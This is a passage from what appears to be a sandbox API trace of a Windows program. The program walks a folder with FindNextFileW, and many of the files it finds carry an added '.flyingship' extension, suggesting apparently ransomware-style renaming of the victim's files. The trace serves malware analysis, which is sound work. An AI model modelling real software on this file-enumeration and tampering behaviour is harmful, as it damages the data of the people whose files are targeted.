lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0157.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db330 | out: hHeap=0x8a0000) returned 1 [0157.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1df0 | out: hHeap=0x8a0000) returned 1 [0157.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba780 | out: hHeap=0x8a0000) returned 1 [0157.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1df0 [0157.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1db0 [0157.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.236] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1df0 | out: hHeap=0x8a0000) returned 1 [0157.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1df0 [0157.236] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1db0 [0157.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1df0 | out: hHeap=0x8a0000) returned 1 [0157.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0157.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1df0 [0157.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba780 [0157.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1db0 [0157.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba720 [0157.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1dc0 [0157.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8e2a80 [0157.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba720 | out: hHeap=0x8a0000) returned 1 [0157.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1da0 [0157.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba720 [0157.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba750 [0157.237] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d90 [0157.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1da0 | out: hHeap=0x8a0000) returned 1 [0157.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba750 | out: hHeap=0x8a0000) returned 1 [0157.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d90 | out: hHeap=0x8a0000) returned 1 [0157.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba720 | out: hHeap=0x8a0000) returned 1 [0157.237] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1df0 | out: hHeap=0x8a0000) returned 1 [0157.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2a80 | out: hHeap=0x8a0000) returned 1 [0157.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dc0 | out: hHeap=0x8a0000) returned 1 [0157.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba780 | out: hHeap=0x8a0000) returned 1 [0157.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0157.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1dc0 [0157.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dc0 | out: hHeap=0x8a0000) returned 1 [0157.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1dc0 [0157.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0157.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba780 [0157.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1df0 [0157.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1df0 | out: hHeap=0x8a0000) returned 1 [0157.238] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca497fc0, ftCreationTime.dwHighDateTime=0x1d661bd, ftLastAccessTime.dwLowDateTime=0xca497fc0, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xca50a3e0, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x8580, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="7TIqi.flyingship.m4a", cAlternateFileName="7TIQIF~1.M4A")) returned 1 [0157.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba720 [0157.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0157.238] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1df0 [0157.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba780 | out: hHeap=0x8a0000) returned 1 [0157.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0157.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dc0 | out: hHeap=0x8a0000) returned 1 [0157.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0157.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1df0 | out: hHeap=0x8a0000) returned 1 [0157.238] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba720 | out: hHeap=0x8a0000) returned 1 [0157.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1df0 [0157.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1dc0 [0157.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dc0 | out: hHeap=0x8a0000) returned 1 [0157.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1df0 | out: hHeap=0x8a0000) returned 1 [0157.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1df0 [0157.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1dc0 [0157.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dc0 | out: hHeap=0x8a0000) returned 1 [0157.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1df0 | out: hHeap=0x8a0000) returned 1 [0157.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0157.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1df0 [0157.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba720 [0157.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1dc0 [0157.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0157.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba780 [0157.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1db0 [0157.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x8e2a80 [0157.239] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba780 | out: hHeap=0x8a0000) returned 1 [0157.239] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e85e0 [0157.240] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d90 [0157.240] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba780 [0157.240] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba750 [0157.240] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1da0 [0157.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e85e0 | out: hHeap=0x8a0000) returned 1 [0157.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d90 | out: hHeap=0x8a0000) returned 1 [0157.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba750 | out: hHeap=0x8a0000) returned 1 [0157.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1da0 | out: hHeap=0x8a0000) returned 1 [0157.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba780 | out: hHeap=0x8a0000) returned 1 [0157.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0157.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1dc0 | out: hHeap=0x8a0000) returned 1 [0157.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1df0 | out: hHeap=0x8a0000) returned 1 [0157.240] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1660) returned 0x8f0e80 [0157.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f03b8 | out: hHeap=0x8a0000) returned 1 [0157.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2a80 | out: hHeap=0x8a0000) returned 1 [0157.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1db0 | out: hHeap=0x8a0000) returned 1 [0157.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba720 | out: hHeap=0x8a0000) returned 1 [0157.240] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0157.240] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1db0 [0157.240] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca5eec20, ftCreationTime.dwHighDateTime=0x1d661bd, ftLastAccessTime.dwLowDateTime=0xca5eec20, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xca63aee0, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0xeb80, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="7zcAt1JobB0Roi5s.flyingship.avi", cAlternateFileName="7ZCAT1~2.AVI")) returned 1 [0157.240] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba780 [0157.240] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db330 [0157.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1df0 [0157.241] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca95abc0, ftCreationTime.dwHighDateTime=0x1d661bd, ftLastAccessTime.dwLowDateTime=0xca95abc0, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xca9f3140, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0xfb20, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="8dBnuAEyPilbFpD.flyingship.gif", cAlternateFileName="8DBNUA~2.GIF")) returned 1 [0157.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba720 [0157.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db330 [0157.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1df0 [0157.241] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcaad7980, ftCreationTime.dwHighDateTime=0x1d661bd, ftLastAccessTime.dwLowDateTime=0xcaad7980, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xcab96060, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x5c50, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="9MGcT.flyingship.mp3", cAlternateFileName="9MGCTF~1.MP3")) returned 1 [0157.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba780 [0157.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0157.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1df0 [0157.241] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcaceccc0, ftCreationTime.dwHighDateTime=0x1d661bd, ftLastAccessTime.dwLowDateTime=0xcaceccc0, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xcaceccc0, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="bjqwuj.flyingship.exe", cAlternateFileName="BJQWUJ~1.EXE")) returned 1 [0157.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba720 [0157.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0157.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1df0 [0157.241] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfee06400, ftCreationTime.dwHighDateTime=0x1d5d866, ftLastAccessTime.dwLowDateTime=0x9c0fa5c0, ftLastAccessTime.dwHighDateTime=0x1d5db77, ftLastWriteTime.dwLowDateTime=0x9c0fa5c0, ftLastWriteTime.dwHighDateTime=0x1d5db77, nFileSizeHigh=0x0, nFileSizeLow=0xe652, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="bQ9gmgo1CPU5L0JTf.png", cAlternateFileName="BQ9GMG~1.PNG")) returned 1 [0157.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba780 [0157.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0157.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1df0 [0157.241] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7b58cd0, ftCreationTime.dwHighDateTime=0x1d5e423, ftLastAccessTime.dwLowDateTime=0x64768a0, ftLastAccessTime.dwHighDateTime=0x1d5e3d5, ftLastWriteTime.dwLowDateTime=0x64768a0, ftLastWriteTime.dwHighDateTime=0x1d5e3d5, nFileSizeHigh=0x0, nFileSizeLow=0x81f0, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="CosD3IMWD.wav", cAlternateFileName="COSD3I~1.WAV")) returned 1 [0157.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba720 [0157.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0157.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1df0 [0157.241] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb59a9e50, ftCreationTime.dwHighDateTime=0x1d5d983, ftLastAccessTime.dwLowDateTime=0x6bc54d10, ftLastAccessTime.dwHighDateTime=0x1d5de75, ftLastWriteTime.dwLowDateTime=0x6bc54d10, ftLastWriteTime.dwHighDateTime=0x1d5de75, nFileSizeHigh=0x0, nFileSizeLow=0xf73d, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="DBSZqxeH.pps", cAlternateFileName="")) returned 1 [0157.241] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba780 [0157.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0157.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1df0 [0157.242] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0157.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba720 [0157.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0157.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1df0 [0157.242] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa00b9030, ftCreationTime.dwHighDateTime=0x1d5d7c1, ftLastAccessTime.dwLowDateTime=0xa6ca5750, ftLastAccessTime.dwHighDateTime=0x1d5df94, ftLastWriteTime.dwLowDateTime=0xa6ca5750, ftLastWriteTime.dwHighDateTime=0x1d5df94, nFileSizeHigh=0x0, nFileSizeLow=0x2520, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="FAlaByDgBqpgWn8JbOac.mp3", cAlternateFileName="FALABY~1.MP3")) returned 1 [0157.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba780 [0157.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db330 [0157.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1df0 [0157.242] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ed1cf80, ftCreationTime.dwHighDateTime=0x1d5e7d3, ftLastAccessTime.dwLowDateTime=0xac0935f0, ftLastAccessTime.dwHighDateTime=0x1d5dbc6, ftLastWriteTime.dwLowDateTime=0xac0935f0, ftLastWriteTime.dwHighDateTime=0x1d5dbc6, nFileSizeHigh=0x0, nFileSizeLow=0x16c92, dwReserved0=0x8a0000, dwReserved1=0x8a7560, cFileName="FL0fY8Lpz-WJNvLo.flv", cAlternateFileName="FL0FY8~1.FLV")) returned 1 [0157.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba720 [0157.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0157.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1df0 [0157.242] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f29a7a0, ftCreationTime.dwHighDateTime=0x1d5e792, ftLastAccessTime.dwLowDateTime=0xea88a2f0, ftLastAccessTime.dwHighDateTime=0x1d5e311, ftLastWriteTime.dwLowDateTime=0xea88a2f0, ftLastWriteTime.dwHighDateTime=0x1d5e311, nFileSizeHigh=0x0, nFileSizeLow=0x14234, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="gJmnMJqziFMsIe_.wav", cAlternateFileName="GJMNMJ~1.WAV")) returned 1 [0157.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba780 [0157.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0157.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1df0 [0157.242] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42ecd740, ftCreationTime.dwHighDateTime=0x1d5e024, ftLastAccessTime.dwLowDateTime=0x92721dc0, ftLastAccessTime.dwHighDateTime=0x1d5e470, ftLastWriteTime.dwLowDateTime=0x92721dc0, ftLastWriteTime.dwHighDateTime=0x1d5e470, nFileSizeHigh=0x0, nFileSizeLow=0x18b40, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="gV7qJagBY9A.mkv", cAlternateFileName="GV7QJA~1.MKV")) returned 1 [0157.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba720 [0157.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0157.242] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1df0 [0157.247] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x20d25ab0, ftCreationTime.dwHighDateTime=0x1d5dd70, ftLastAccessTime.dwLowDateTime=0xbb9f920, ftLastAccessTime.dwHighDateTime=0x1d5d7fe, ftLastWriteTime.dwLowDateTime=0xbb9f920, ftLastWriteTime.dwHighDateTime=0x1d5d7fe, nFileSizeHigh=0x0, nFileSizeLow=0x10f89, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="gx8HB3O7amX5sO9SwzMc.wav", cAlternateFileName="GX8HB3~1.WAV")) returned 1 [0157.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba780 [0157.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db330 [0157.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1df0 [0157.248] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0f28b60, ftCreationTime.dwHighDateTime=0x1d5e03f, ftLastAccessTime.dwLowDateTime=0x2cab6d60, ftLastAccessTime.dwHighDateTime=0x1d5df44, ftLastWriteTime.dwLowDateTime=0x2cab6d60, ftLastWriteTime.dwHighDateTime=0x1d5df44, nFileSizeHigh=0x0, nFileSizeLow=0x15f5a, dwReserved0=0x8a0000, dwReserved1=0x8a7560, cFileName="gyeJKtGlaF.bmp", cAlternateFileName="GYEJKT~1.BMP")) returned 1 [0157.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba720 [0157.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0157.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1df0 [0157.248] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ab10d10, ftCreationTime.dwHighDateTime=0x1d5e2d8, ftLastAccessTime.dwLowDateTime=0xf7a7c0f0, ftLastAccessTime.dwHighDateTime=0x1d5de94, ftLastWriteTime.dwLowDateTime=0xf7a7c0f0, ftLastWriteTime.dwHighDateTime=0x1d5de94, nFileSizeHigh=0x0, nFileSizeLow=0x13f6b, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="Iu4ghlu.mp4", cAlternateFileName="")) returned 1 [0157.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba780 [0157.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0157.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1df0 [0157.248] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4607d630, ftCreationTime.dwHighDateTime=0x1d5e111, ftLastAccessTime.dwLowDateTime=0x3db91a60, ftLastAccessTime.dwHighDateTime=0x1d5dcda, ftLastWriteTime.dwLowDateTime=0x3db91a60, ftLastWriteTime.dwHighDateTime=0x1d5dcda, nFileSizeHigh=0x0, nFileSizeLow=0x7a52, dwReserved0=0x10, dwReserved1=0x8a7560, cFileName="J-Lwl.pptx", cAlternateFileName="J-LWL~1.PPT")) returned 1 [0157.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba720 [0157.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0157.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1df0 [0157.248] FindNextFileW (in: hFindFile=0x90ae58, lpFindFileData=0x87e870 | out: lpFindFileData=0x87e870*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf91c4650, ftCreationTime.dwHighDateTime=0x1d5ddd5, ftLastAccessTime.dwLowDateTime=0x80d0ad70, ftLastAccessTime.dwHighDateTime=0x1d5dde0, ftLastWriteTime.dwLowDateTime=0x80d0ad70, ftLastWriteTime.dwHighDateTime=0x1d5dde0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x8a7560, 